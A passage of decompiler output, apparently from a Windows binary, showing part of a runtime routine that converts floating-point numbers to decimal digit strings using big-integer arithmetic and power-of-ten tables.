                                    															}
                                    															__eflags = _v1865;
                                    															_t1025 = 0x1cc;
                                    															if(_v1865 == 0) {
                                    																_v472 = _t1142;
                                    															} else {
                                    																_v472 = _t1142 + 1;
                                    															}
                                    														}
                                    													}
                                    													_v1392 = _v1392 & 0x00000000;
                                    													_t999 = 4;
                                    													__eflags = 1;
                                    													_v1396 = _t999;
                                    													_v1400 = 1;
                                    													_v936 = 1;
                                    													_push(_t999);
                                    												}
                                    												goto L52;
                                    											}
                                    											goto L53;
                                    										}
                                    										L52:
                                    										_push( &_v1396);
                                    										_push(_t1025);
                                    										_push( &_v932);
                                    										L313();
                                    										_t1241 =  &(_t1237[4]);
                                    									}
                                    									_t782 = _v1904;
                                    									_t1043 = 0xa;
                                    									_v1912 = _t1043;
                                    									__eflags = _t782;
                                    									if(_t782 < 0) {
                                    										_t783 =  ~_t782;
                                    										_t784 = _t783 / _t1043;
                                    										_v1880 = _t784;
                                    										_t1044 = _t783 % _t1043;
                                    										_v1884 = _t1044;
                                    										__eflags = _t784;
                                    										if(_t784 == 0) {
                                    											L249:
                                    											__eflags = _t1044;
                                    											if(_t1044 != 0) {
                                    												_t820 =  *(0x458654 + _t1044 * 4);
                                    												_v1896 = _t820;
                                    												__eflags = _t820;
                                    												if(_t820 == 0) {
                                    													L260:
                                    													__eflags = 0;
                                    													_push(0);
                                    													_v472 = 0;
                                    													_v2408 = 0;
                                    													goto L261;
                                    												} else {
                                    													__eflags = _t820 - 1;
                                    													if(_t820 != 1) {
                                    														_t1055 = _v472;
                                    														__eflags = _t1055;
                                    														if(_t1055 != 0) {
                                    															_t1161 = 0;
                                    															_t1213 = 0;
                                    															__eflags = 0;
                                    															do {
                                    																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
                                    																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
                                    																_t820 = _v1896;
                                    																asm("adc edx, 0x0");
                                    																_t1213 = _t1213 + 1;
                                    																_t1161 = _t1113;
                                    																__eflags = _t1213 - _t1055;
                                    															} while (_t1213 != _t1055);
                                    															__eflags = _t1161;
                                    															if(_t1161 != 0) {
                                    																_t826 = _v472;
                                    																__eflags = _t826 - 0x73;
                                    																if(_t826 >= 0x73) {
                                    																	goto L260;
                                    																} else {
                                    																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
                                    																	_v472 = _v472 + 1;
                                    																}
                                    															}
                                    														}
                                    													}
                                    												}
                                    											}
                                    										} else {
                                    											do {
                                    												__eflags = _t784 - 0x26;
                                    												if(_t784 > 0x26) {
                                    													_t784 = 0x26;
                                    												}
                                    												_t1056 =  *(0x4585be + _t784 * 4) & 0x000000ff;
                                    												_v1872 = _t784;
                                    												_v1400 = ( *(0x4585be + _t784 * 4) & 0x000000ff) + ( *(0x4585bf + _t784 * 4) & 0x000000ff);
                                    												L00431F00(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
                                    												_t837 = E004324E0( &(( &_v1396)[_t1056]), 0x457cb8 + ( *(0x4585bc + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x4585bf + _t784 * 4) & 0x000000ff) << 2);
                                    												_t1057 = _v1400;
                                    												_t1241 =  &(_t1241[6]);
                                    												_v1892 = _t1057;
                                    												__eflags = _t1057 - 1;
                                    												if(_t1057 > 1) {
                                    													__eflags = _v472 - 1;
                                    													if(_v472 > 1) {
                                    														__eflags = _t1057 - _v472;
                                    														_t1164 =  &_v1396;
                                    														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
                                    														__eflags = _t838;
                                    														if(_t838 != 0) {
                                    															_t1114 =  &_v468;
                                    														} else {
                                    															_t1164 =  &_v468;
                                    															_t1114 =  &_v1396;
                                    														}
                                    														_v1908 = _t1114;
                                    														__eflags = _t838;
                                    														if(_t838 == 0) {
                                    															_t1057 = _v472;
                                    														}
                                    														_v1876 = _t1057;
                                    														__eflags = _t838;
                                    														if(_t838 != 0) {
                                    															_v1892 = _v472;
                                    														}
                                    														_t1115 = 0;
                                    														_t1215 = 0;
                                    														_v1864 = 0;
                                    														__eflags = _t1057;
                                    														if(_t1057 == 0) {
                                    															L243:
                                    															_v472 = _t1115;
                                    															_t840 = _t1115 << 2;
                                    															__eflags = _t840;
                                    															_push(_t840);
                                    															_t841 =  &_v1860;
                                    															goto L244;
                                    														} else {
                                    															_t1165 = _t1164 -  &_v1860;
                                    															__eflags = _t1165;
                                    															_v1928 = _t1165;
                                    															do {
                                    																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
                                    																_v1896 = _t847;
                                    																__eflags = _t847;
                                    																if(_t847 != 0) {
                                    																	_t848 = 0;
                                    																	_t1166 = 0;
                                    																	_t1058 = _t1215;
                                    																	_v1888 = 0;
                                    																	__eflags = _v1892;
                                    																	if(_v1892 == 0) {
                                    																		L240:
                                    																		__eflags = _t1058 - 0x73;
                                    																		if(_t1058 == 0x73) {
                                    																			goto L258;
                                    																		} else {
                                    																			_t1165 = _v1928;
                                    																			_t1057 = _v1876;
                                    																			goto L242;
                                    																		}
                                    																	} else {
                                    																		while(1) {
                                    																			__eflags = _t1058 - 0x73;
                                    																			if(_t1058 == 0x73) {
                                    																				goto L235;
                                    																			}
                                    																			__eflags = _t1058 - _t1115;
                                    																			if(_t1058 == _t1115) {
                                    																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
                                    																				_t859 = _t848 + 1 + _t1215;
                                    																				__eflags = _t859;
                                    																				_v1864 = _t859;
                                    																				_t848 = _v1888;
                                    																			}
                                    																			_t854 =  *(_v1908 + _t848 * 4);
                                    																			asm("adc edx, 0x0");
                                    																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
                                    																			asm("adc edx, 0x0");
                                    																			_t848 = _v1888 + 1;
                                    																			_t1058 = _t1058 + 1;
                                    																			_v1888 = _t848;
                                    																			_t1166 = _t854 * _v1896 >> 0x20;
                                    																			_t1115 = _v1864;
                                    																			__eflags = _t848 - _v1892;
                                    																			if(_t848 != _v1892) {
                                    																				continue;
                                    																			} else {
                                    																				goto L235;
                                    																			}
                                    																			while(1) {
                                    																				L235:
                                    																				__eflags = _t1166;
                                    																				if(_t1166 == 0) {
                                    																					goto L240;
                                    																				}
                                    																				__eflags = _t1058 - 0x73;
                                    																				if(_t1058 == 0x73) {
                                    																					goto L258;
                                    																				} else {
                                    																					__eflags = _t1058 - _t1115;
                                    																					if(_t1058 == _t1115) {
                                    																						_t558 = _t1235 + _t1058 * 4 - 0x740;
                                    																						 *_t558 =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
                                    																						__eflags =  *_t558;
                                    																						_t564 = _t1058 + 1; // 0x1
                                    																						_v1864 = _t564;
                                    																					}
                                    																					_t852 = _t1166;
                                    																					_t1166 = 0;
                                    																					 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t852;
                                    																					_t1115 = _v1864;
                                    																					asm("adc edi, edi");
                                    																					_t1058 = _t1058 + 1;
                                    																					continue;
                                    																				}
                                    																				goto L246;
                                    																			}
                                    																			goto L240;
                                    																		}
                                    																		goto L235;
                                    																	}
                                    																} else {
                                    																	__eflags = _t1215 - _t1115;
                                    																	if(_t1215 == _t1115) {
                                    																		 *(_t1235 + _t1215 * 4 - 0x740) =  *(_t1235 + _t1215 * 4 - 0x740) & _t847;
                                    																		_t526 = _t1215 + 1; // 0x1
                                    																		_t1115 = _t526;
                                    																		_v1864 = _t1115;
                                    																	}
                                    																	goto L242;
                                    																}
                                    																goto L246;
                                    																L242:
                                    																_t1215 = _t1215 + 1;
                                    																__eflags = _t1215 - _t1057;
                                    															} while (_t1215 != _t1057);
                                    															goto L243;
                                    														}
                                    													} else {
                                    														_t1167 = _v468;
                                    														_push(_t1057 << 2);
                                    														_v472 = _t1057;
                                    														_push( &_v1396);
                                    														_push(_t1025);
                                    														_push( &_v468);
                                    														L313();
                                    														_t1241 =  &(_t1241[4]);
                                    														__eflags = _t1167;
                                    														if(_t1167 == 0) {
                                    															goto L203;
                                    														} else {
                                    															__eflags = _t1167 - 1;
                                    															if(_t1167 == 1) {
                                    																goto L245;
                                    															} else {
                                    																__eflags = _v472;
                                    																if(_v472 == 0) {
                                    																	goto L245;
                                    																} else {
                                    																	_t1059 = 0;
                                    																	_v1896 = _v472;
                                    																	_t1216 = 0;
                                    																	__eflags = 0;
                                    																	do {
                                    																		_t867 = _t1167;
                                    																		_t1116 = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) >> 0x20;
                                    																		 *(_t1235 + _t1216 * 4 - 0x1d0) = _t867 *  *(_t1235 + _t1216 * 4 - 0x1d0) + _t1059;
                                    																		asm("adc edx, 0x0");
                                    																		_t1216 = _t1216 + 1;
                                    																		_t1059 = _t1116;
                                    																		__eflags = _t1216 - _v1896;
                                    																	} while (_t1216 != _v1896);
                                    																	goto L208;
                                    																}
                                    															}
                                    														}
                                    													}
                                    												} else {
                                    													_t1168 = _v1396;
                                    													__eflags = _t1168;
                                    													if(_t1168 != 0) {
                                    														__eflags = _t1168 - 1;
                                    														if(_t1168 == 1) {
                                    															goto L245;
                                    														} else {
                                    															__eflags = _v472;
                                    															if(_v472 == 0) {
                                    																goto L245;
                                    															} else {
                                    																_t1060 = 0;
                                    																_v1896 = _v472;
                                    																_t1217 = 0;
                                    																__eflags = 0;
                                    																do {
                                    																	_t872 = _t1168;
                                    																	_t1117 = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) >> 0x20;
                                    																	 *(_t1235 + _t1217 * 4 - 0x1d0) = _t872 *  *(_t1235 + _t1217 * 4 - 0x1d0) + _t1060;
                                    																	asm("adc edx, 0x0");
                                    																	_t1217 = _t1217 + 1;
                                    																	_t1060 = _t1117;
                                    																	__eflags = _t1217 - _v1896;
                                    																} while (_t1217 != _v1896);
                                    																L208:
                                    																__eflags = _t1059;
                                    																if(_t1059 == 0) {
                                    																	goto L245;
                                    																} else {
                                    																	_t870 = _v472;
                                    																	__eflags = _t870 - 0x73;
                                    																	if(_t870 >= 0x73) {
                                    																		L258:
                                    																		_push(0);
                                    																		_v2408 = 0;
                                    																		_v472 = 0;
                                    																		_push( &_v2404);
                                    																		_push(_t1025);
                                    																		_push( &_v468);
                                    																		L313();
                                    																		_t1241 =  &(_t1241[4]);
                                    																		_t843 = 0;
                                    																	} else {
                                    																		 *(_t1235 + _t870 * 4 - 0x1d0) = _t1059;
                                    																		_v472 = _v472 + 1;
                                    																		goto L245;
                                    																	}
                                    																}
                                    															}
                                    														}
                                    													} else {
                                    														L203:
                                    														_v2408 = 0;
                                    														_v472 = 0;
                                    														_push(0);
                                    														_t841 =  &_v2404;
                                    														L244:
                                    														_push(_t841);
                                    														_push(_t1025);
                                    														_push( &_v468);
                                    														L313();
                                    														_t1241 =  &(_t1241[4]);
                                    														L245:
                                    														_t843 = 1;
                                    													}
                                    												}
                                    												L246:
                                    												__eflags = _t843;
                                    												if(_t843 == 0) {
                                    													_v2408 = _v2408 & 0x00000000;
                                    													_v472 = _v472 & 0x00000000;
                                    													_push(0);
                                    													L261:
                                    													_push( &_v2404);
                                    													_t823 =  &_v468;
                                    													goto L262;
                                    												} else {
                                    													goto L247;
                                    												}
                                    												goto L263;
                                    												L247:
                                    												_t784 = _v1880 - _v1872;
                                    												__eflags = _t784;
                                    												_v1880 = _t784;
                                    											} while (_t784 != 0);
                                    											_t1044 = _v1884;
                                    											goto L249;
                                    										}
                                    									} else {
                                    										_t875 = _t782 / _t1043;
                                    										_v1908 = _t875;
                                    										_t1061 = _t782 % _t1043;
                                    										_v1896 = _t1061;
                                    										__eflags = _t875;
                                    										if(_t875 == 0) {
                                    											L184:
                                    											__eflags = _t1061;
                                    											if(_t1061 != 0) {
                                    												_t1169 =  *(0x458654 + _t1061 * 4);
                                    												__eflags = _t1169;
                                    												if(_t1169 != 0) {
                                    													__eflags = _t1169 - 1;
                                    													if(_t1169 != 1) {
                                    														_t876 = _v936;
                                    														_v1896 = _t876;
                                    														__eflags = _t876;
                                    														if(_t876 != 0) {
                                    															_t1218 = 0;
                                    															_t1062 = 0;
                                    															__eflags = 0;
                                    															do {
                                    																_t877 = _t1169;
                                    																_t1121 = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) >> 0x20;
                                    																 *(_t1235 + _t1062 * 4 - 0x3a0) = _t877 *  *(_t1235 + _t1062 * 4 - 0x3a0) + _t1218;
                                    																asm("adc edx, 0x0");
                                    																_t1062 = _t1062 + 1;
                                    																_t1218 = _t1121;
                                    																__eflags = _t1062 - _v1896;
                                    															} while (_t1062 != _v1896);
                                    															__eflags = _t1218;
                                    															if(_t1218 != 0) {
                                    																_t880 = _v936;
                                    																__eflags = _t880 - 0x73;
                                    																if(_t880 >= 0x73) {
                                    																	goto L186;
                                    																} else {
                                    																	 *(_t1235 + _t880 * 4 - 0x3a0) = _t1218;
                                    																	_v936 = _v936 + 1;
                                    																}
                                    															}
                                    														}
                                    													}
                                    												} else {
                                    													L186:
                                    													_v2408 = 0;
                                    													_v936 = 0;
                                    													_push(0);
                                    													goto L190;
                                    												}
                                    											}
                                    										} else {
                                    											do {
                                    												__eflags = _t875 - 0x26;
                                    												if(_t875 > 0x26) {
                                    													_t875 = 0x26;
                                    												}
                                    												_t1063 =  *(0x4585be + _t875 * 4) & 0x000000ff;
                                    												_v1888 = _t875;
                                    												_v1400 = ( *(0x4585be + _t875 * 4) & 0x000000ff) + ( *(0x4585bf + _t875 * 4) & 0x000000ff);
                                    												L00431F00(_t1063 << 2,  &_v1396, 0, _t1063 << 2);
                                    												_t893 = E004324E0( &(( &_v1396)[_t1063]), 0x457cb8 + ( *(0x4585bc + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x4585bf + _t875 * 4) & 0x000000ff) << 2);
                                    												_t1064 = _v1400;
                                    												_t1241 =  &(_t1241[6]);
                                    												_v1892 = _t1064;
                                    												__eflags = _t1064 - 1;
                                    												if(_t1064 > 1) {
                                    													__eflags = _v936 - 1;
                                    													if(_v936 > 1) {
                                    														__eflags = _t1064 - _v936;
                                    														_t1172 =  &_v1396;
                                    														_t894 = _t893 & 0xffffff00 | _t1064 - _v936 > 0x00000000;
                                    														__eflags = _t894;
                                    														if(_t894 != 0) {
                                    															_t1122 =  &_v932;
                                    														} else {
                                    															_t1172 =  &_v932;
                                    															_t1122 =  &_v1396;
                                    														}
                                    														_v1876 = _t1122;
                                    														__eflags = _t894;
                                    														if(_t894 == 0) {
                                    															_t1064 = _v936;
                                    														}
                                    														_v1880 = _t1064;
                                    														__eflags = _t894;
                                    														if(_t894 != 0) {
                                    															_v1892 = _v936;
                                    														}
                                    														_t1123 = 0;
                                    														_t1220 = 0;
                                    														_v1864 = 0;
                                    														__eflags = _t1064;
                                    														if(_t1064 == 0) {
                                    															L177:
                                    															_v936 = _t1123;
                                    															_t896 = _t1123 << 2;
                                    															__eflags = _t896;
                                    															goto L178;
                                    														} else {
                                    															_t1173 = _t1172 -  &_v1860;
                                    															__eflags = _t1173;
                                    															_v1928 = _t1173;
                                    															do {
                                    																_t903 =  *(_t1235 + _t1173 + _t1220 * 4 - 0x740);
                                    																_v1884 = _t903;
                                    																__eflags = _t903;
                                    																if(_t903 != 0) {
                                    																	_t904 = 0;
                                    																	_t1174 = 0;
                                    																	_t1065 = _t1220;
                                    																	_v1872 = 0;
                                    																	__eflags = _v1892;
                                    																	if(_v1892 == 0) {
                                    																		L174:
                                    																		__eflags = _t1065 - 0x73;
                                    																		if(_t1065 == 0x73) {
                                    																			goto L187;
                                    																		} else {
                                    																			_t1173 = _v1928;
                                    																			_t1064 = _v1880;
                                    																			goto L176;
                                    																		}
                                    																	} else {
                                    																		while(1) {
                                    																			__eflags = _t1065 - 0x73;
                                    																			if(_t1065 == 0x73) {
                                    																				goto L169;
                                    																			}
                                    																			__eflags = _t1065 - _t1123;
                                    																			if(_t1065 == _t1123) {
                                    																				 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
                                    																				_t915 = _t904 + 1 + _t1220;
                                    																				__eflags = _t915;
                                    																				_v1864 = _t915;
                                    																				_t904 = _v1872;
                                    																			}
                                    																			_t910 =  *(_v1876 + _t904 * 4);
                                    																			asm("adc edx, 0x0");
                                    																			 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t910 * _v1884 + _t1174;
                                    																			asm("adc edx, 0x0");
                                    																			_t904 = _v1872 + 1;
                                    																			_t1065 = _t1065 + 1;
                                    																			_v1872 = _t904;
                                    																			_t1174 = _t910 * _v1884 >> 0x20;
                                    																			_t1123 = _v1864;
                                    																			__eflags = _t904 - _v1892;
                                    																			if(_t904 != _v1892) {
                                    																				continue;
                                    																			} else {
                                    																				goto L169;
                                    																			}
                                    																			while(1) {
                                    																				L169:
                                    																				__eflags = _t1174;
                                    																				if(_t1174 == 0) {
                                    																					goto L174;
                                    																				}
                                    																				__eflags = _t1065 - 0x73;
                                    																				if(_t1065 == 0x73) {
                                    																					L187:
                                    																					__eflags = 0;
                                    																					_v2408 = 0;
                                    																					_v936 = 0;
                                    																					_push(0);
                                    																					_t906 =  &_v2404;
                                    																					goto L188;
                                    																				} else {
                                    																					__eflags = _t1065 - _t1123;
                                    																					if(_t1065 == _t1123) {
                                    																						_t370 = _t1235 + _t1065 * 4 - 0x740;
                                    																						 *_t370 =  *(_t1235 + _t1065 * 4 - 0x740) & 0x00000000;
                                    																						__eflags =  *_t370;
                                    																						_t376 = _t1065 + 1; // 0x1
                                    																						_v1864 = _t376;
                                    																					}
                                    																					_t908 = _t1174;
                                    																					_t1174 = 0;
                                    																					 *(_t1235 + _t1065 * 4 - 0x740) =  *(_t1235 + _t1065 * 4 - 0x740) + _t908;
                                    																					_t1123 = _v1864;
                                    																					asm("adc edi, edi");
                                    																					_t1065 = _t1065 + 1;
                                    																					continue;
                                    																				}
                                    																				goto L181;
                                    																			}
                                    																			goto L174;
                                    																		}
                                    																		goto L169;
                                    																	}
                                    																} else {
                                    																	__eflags = _t1220 - _t1123;
                                    																	if(_t1220 == _t1123) {
                                    																		 *(_t1235 + _t1220 * 4 - 0x740) =  *(_t1235 + _t1220 * 4 - 0x740) & _t903;
                                    																		_t338 = _t1220 + 1; // 0x1
                                    																		_t1123 = _t338;
                                    																		_v1864 = _t1123;
                                    																	}
                                    																	goto L176;
                                    																}
                                    																goto L181;
                                    																L176:
                                    																_t1220 = _t1220 + 1;
                                    																__eflags = _t1220 - _t1064;
                                    															} while (_t1220 != _t1064);
                                    															goto L177;
                                    														}
                                    													} else {
                                    														_t1175 = _v932;
                                    														_push(_t1064 << 2);
                                    														_v936 = _t1064;
                                    														_push( &_v1396);
                                    														_push(_t1025);
                                    														_push( &_v932);
                                    														L313();
                                    														_t1241 =  &(_t1241[4]);
                                    														__eflags = _t1175;
                                    														if(_t1175 != 0) {
                                    															__eflags = _t1175 - 1;
                                    															if(_t1175 == 1) {
                                    																goto L180;
                                    															} else {
                                    																__eflags = _v936;
                                    																if(_v936 == 0) {
                                    																	goto L180;
                                    																} else {
                                    																	_t1066 = 0;
                                    																	_v1884 = _v936;
                                    																	_t1221 = 0;
                                    																	__eflags = 0;
                                    																	do {
                                    																		_t922 = _t1175;
                                    																		_t1124 = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) >> 0x20;
                                    																		 *(_t1235 + _t1221 * 4 - 0x3a0) = _t922 *  *(_t1235 + _t1221 * 4 - 0x3a0) + _t1066;
                                    																		asm("adc edx, 0x0");
                                    																		_t1221 = _t1221 + 1;
                                    																		_t1066 = _t1124;
                                    																		__eflags = _t1221 - _v1884;
                                    																	} while (_t1221 != _v1884);
                                    																	goto L149;
                                    																}
                                    															}
                                    														} else {
                                    															_v1400 = 0;
                                    															_v936 = 0;
                                    															_push(0);
                                    															_t897 =  &_v1396;
                                    															goto L179;
                                    														}
                                    													}
                                    												} else {
                                    													_t1176 = _v1396;
                                    													__eflags = _t1176;
                                    													if(_t1176 != 0) {
                                    														__eflags = _t1176 - 1;
                                    														if(_t1176 == 1) {
                                    															goto L180;
                                    														} else {
                                    															__eflags = _v936;
                                    															if(_v936 == 0) {
                                    																goto L180;
                                    															} else {
                                    																_t1067 = 0;
                                    																_v1884 = _v936;
                                    																_t1222 = 0;
                                    																__eflags = 0;
                                    																do {
                                    																	_t929 = _t1176;
                                    																	_t1125 = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) >> 0x20;
                                    																	 *(_t1235 + _t1222 * 4 - 0x3a0) = _t929 *  *(_t1235 + _t1222 * 4 - 0x3a0) + _t1067;
                                    																	asm("adc edx, 0x0");
                                    																	_t1222 = _t1222 + 1;
                                    																	_t1067 = _t1125;
                                    																	__eflags = _t1222 - _v1884;
                                    																} while (_t1222 != _v1884);
                                    																L149:
                                    																__eflags = _t1066;
                                    																if(_t1066 == 0) {
                                    																	goto L180;
                                    																} else {
                                    																	_t925 = _v936;
                                    																	__eflags = _t925 - 0x73;
                                    																	if(_t925 < 0x73) {
                                    																		 *(_t1235 + _t925 * 4 - 0x3a0) = _t1066;
                                    																		_v936 = _v936 + 1;
                                    																		goto L180;
                                    																	} else {
                                    																		_v1400 = 0;
                                    																		_v936 = 0;
                                    																		_push(0);
                                    																		_t906 =  &_v1396;
                                    																		L188:
                                    																		_push(_t906);
                                    																		_push(_t1025);
                                    																		_push( &_v932);
                                    																		L313();
                                    																		_t1241 =  &(_t1241[4]);
                                    																		_t899 = 0;
                                    																	}
                                    																}
                                    															}
                                    														}
                                    													} else {
                                    														_t896 = 0;
                                    														_v1864 = 0;
                                    														_v936 = 0;
                                    														L178:
                                    														_push(_t896);
                                    														_t897 =  &_v1860;
                                    														L179:
                                    														_push(_t897);
                                    														_push(_t1025);
                                    														_push( &_v932);
                                    														L313();
                                    														_t1241 =  &(_t1241[4]);
                                    														L180:
                                    														_t899 = 1;
                                    													}
                                    												}
                                    												L181:
                                    												__eflags = _t899;
                                    												if(_t899 == 0) {
                                    													_v2408 = _v2408 & 0x00000000;
                                    													_t404 =  &_v936;
                                    													 *_t404 = _v936 & 0x00000000;
                                    													__eflags =  *_t404;
                                    													_push(0);
                                    													L190:
                                    													_push( &_v2404);
                                    													_t823 =  &_v932;
                                    													L262:
                                    													_push(_t1025);
                                    													_push(_t823);
                                    													L313();
                                    													_t1241 =  &(_t1241[4]);
                                    												} else {
                                    													goto L182;
                                    												}
                                    												goto L263;
                                    												L182:
                                    												_t875 = _v1908 - _v1888;
                                    												__eflags = _t875;
                                    												_v1908 = _t875;
                                    											} while (_t875 != 0);
                                    											_t1061 = _v1896;
                                    											goto L184;
                                    										}
                                    									}
                                    									L263:
                                    									_t1156 = _v1920;
                                    									_t1208 = _t1156;
                                    									_t1045 = _v472;
                                    									_v1872 = _t1208;
                                    									__eflags = _t1045;
                                    									if(_t1045 != 0) {
                                    										_t1212 = 0;
                                    										_t1160 = 0;
                                    										__eflags = 0;
                                    										do {
                                    											_t813 =  *(_t1235 + _t1160 * 4 - 0x1d0);
                                    											_t1111 = 0xa;
                                    											_t1112 = _t813 * _t1111 >> 0x20;
                                    											 *(_t1235 + _t1160 * 4 - 0x1d0) = _t813 * _t1111 + _t1212;
                                    											asm("adc edx, 0x0");
                                    											_t1160 = _t1160 + 1;
                                    											_t1212 = _t1112;
                                    											__eflags = _t1160 - _t1045;
                                    										} while (_t1160 != _t1045);
                                    										_v1896 = _t1212;
                                    										__eflags = _t1212;
                                    										_t1208 = _v1872;
                                    										if(_t1212 != 0) {
                                    											_t1054 = _v472;
                                    											__eflags = _t1054 - 0x73;
                                    											if(_t1054 >= 0x73) {
                                    												__eflags = 0;
                                    												_push(0);
                                    												_v2408 = 0;
                                    												_v472 = 0;
                                    												_push( &_v2404);
                                    												_push(_t1025);
                                    												_push( &_v468);
                                    												L313();
                                    												_t1241 =  &(_t1241[4]);
                                    											} else {
                                    												 *(_t1235 + _t1054 * 4 - 0x1d0) = _t1112;
                                    												_v472 = _v472 + 1;
                                    											}
                                    										}
                                    										_t1156 = _t1208;
                                    									}
                                    									_t787 = L0043FA50( &_v472,  &_v936);
                                    									_t1104 = 0xa;
                                    									__eflags = _t787 - _t1104;
                                    									if(_t787 != _t1104) {
                                    										__eflags = _t787;
                                    										if(_t787 != 0) {
                                    											_t788 = _t787 + 0x30;
                                    											__eflags = _t788;
                                    											_t1208 = _t1156 + 1;
                                    											 *_t1156 = _t788;
                                    											_v1872 = _t1208;
                                    											goto L282;
                                    										} else {
                                    											_t789 = _v1904 - 1;
                                    										}
                                    									} else {
                                    										_v1904 = _v1904 + 1;
                                    										_t1208 = _t1156 + 1;
                                    										_t805 = _v936;
                                    										 *_t1156 = 0x31;
                                    										_v1872 = _t1208;
                                    										__eflags = _t805;
                                    										if(_t805 != 0) {
                                    											_t1159 = 0;
                                    											_t1211 = _t805;
                                    											_t1053 = 0;
                                    											__eflags = 0;
                                    											do {
                                    												_t806 =  *(_t1235 + _t1053 * 4 - 0x3a0);
                                    												 *(_t1235 + _t1053 * 4 - 0x3a0) = _t806 * _t1104 + _t1159;
                                    												asm("adc edx, 0x0");
                                    												_t1053 = _t1053 + 1;
                                    												_t1159 = _t806 * _t1104 >> 0x20;
                                    												_t1104 = 0xa;
                                    												__eflags = _t1053 - _t1211;
                                    											} while (_t1053 != _t1211);
                                    											_t1208 = _v1872;
                                    											__eflags = _t1159;
                                    											if(_t1159 != 0) {
                                    												_t809 = _v936;
                                    												__eflags = _t809 - 0x73;
                                    												if(_t809 >= 0x73) {
                                    													_push(0);
                                    													_v2408 = 0;
                                    													_v936 = 0;
                                    													_push( &_v2404);
                                    													_push(_t1025);
                                    													_push( &_v932);
                                    													L313();
                                    													_t1241 =  &(_t1241[4]);
                                    												} else {
                                    													 *(_t1235 + _t809 * 4 - 0x3a0) = _t1159;
                                    													_v936 = _v936 + 1;
                                    												}
                                    											}
                                    										}
                                    										L282:
                                    										_t789 = _v1904;
                                    									}
                                    									 *((intOrPtr*)(_v1924 + 4)) = _t789;
                                    									_t1031 = _v1916;
                                    									__eflags = _t789;
                                    									if(_t789 >= 0) {
                                    										__eflags = _t1031 - 0x7fffffff;
                                    										if(_t1031 <= 0x7fffffff) {
                                    											_t1031 = _t1031 + _t789;
                                    											__eflags = _t1031;
                                    										}
                                    									}
                                    									_t791 = _a24 - 1;
                                    									__eflags = _t791 - _t1031;
                                    									if(_t791 >= _t1031) {
                                    										_t791 = _t1031;
                                    									}
                                    									_t792 = _t791 + _v1920;
                                    									_v1916 = _t792;
                                    									__eflags = _t1208 - _t792;
                                    									if(__eflags != 0) {
                                    										while(1) {
                                    											_t793 = _v472;
                                    											__eflags = _t793;
                                    											if(__eflags == 0) {
                                    												goto L303;
                                    											}
                                    											_t1157 = 0;
                                    											_t1209 = _t793;
                                    											_t1049 = 0;
                                    											__eflags = 0;
                                    											do {
                                    												_t794 =  *(_t1235 + _t1049 * 4 - 0x1d0);
                                    												 *(_t1235 + _t1049 * 4 - 0x1d0) = _t794 * 0x3b9aca00 + _t1157;
                                    												asm("adc edx, 0x0");
                                    												_t1049 = _t1049 + 1;
                                    												_t1157 = _t794 * 0x3b9aca00 >> 0x20;
                                    												__eflags = _t1049 - _t1209;
                                    											} while (_t1049 != _t1209);
                                    											_t1210 = _v1872;
                                    											__eflags = _t1157;
                                    											if(_t1157 != 0) {
                                    												_t800 = _v472;
                                    												__eflags = _t800 - 0x73;
                                    												if(_t800 >= 0x73) {
                                    													__eflags = 0;
                                    													_push(0);
                                    													_v2408 = 0;
                                    													_v472 = 0;
                                    													_push( &_v2404);
                                    													_push(_t1025);
                                    													_push( &_v468);
                                    													L313();
                                    													_t1241 =  &(_t1241[4]);
                                    												} else {
                                    													 *(_t1235 + _t800 * 4 - 0x1d0) = _t1157;
                                    													_v472 = _v472 + 1;
                                    												}
                                    											}
                                    											_t799 = L0043FA50( &_v472,  &_v936);
                                    											_t1158 = 8;
                                    											_t1031 = _v1916 - _t1210;
                                    											__eflags = _t1031;
                                    											do {
                                    												_t708 = _t799 % _v1912;
                                    												_t799 = _t799 / _v1912;
                                    												_t1109 = _t708 + 0x30;
                                    												__eflags = _t1031 - _t1158;
                                    												if(_t1031 >= _t1158) {
                                    													 *((char*)(_t1158 + _t1210)) = _t1109;
                                    												}
                                    												_t1158 = _t1158 - 1;
                                    												__eflags = _t1158 - 0xffffffff;
                                    											} while (_t1158 != 0xffffffff);
                                    											__eflags = _t1031 - 9;
                                    											if(_t1031 > 9) {
                                    												_t1031 = 9;
                                    											}
                                    											_t1208 = _t1210 + _t1031;
                                    											_v1872 = _t1208;
                                    											__eflags = _t1208 - _v1916;
                                    											if(__eflags != 0) {
                                    												continue;
                                    											}
                                    											goto L303;
                                    										}
                                    									}
                                    									L303:
                                    									 *_t1208 = 0;
                                    									goto L309;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					_t1031 = _t1196 & 0x000fffff;
                                    					if((_t1146 | _t1196 & 0x000fffff) != 0) {
                                    						goto L5;
                                    					} else {
                                    						_push("0");
                                    						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
                                    						L308:
                                    						_push(_a24);
                                    						_push(_t1016);
                                    						if(L00441916() != 0) {
                                    							_push(0);
                                    							_push(0);
                                    							_push(0);
                                    							_push(0);
                                    							_push(0);
                                    							L0043698A(0);
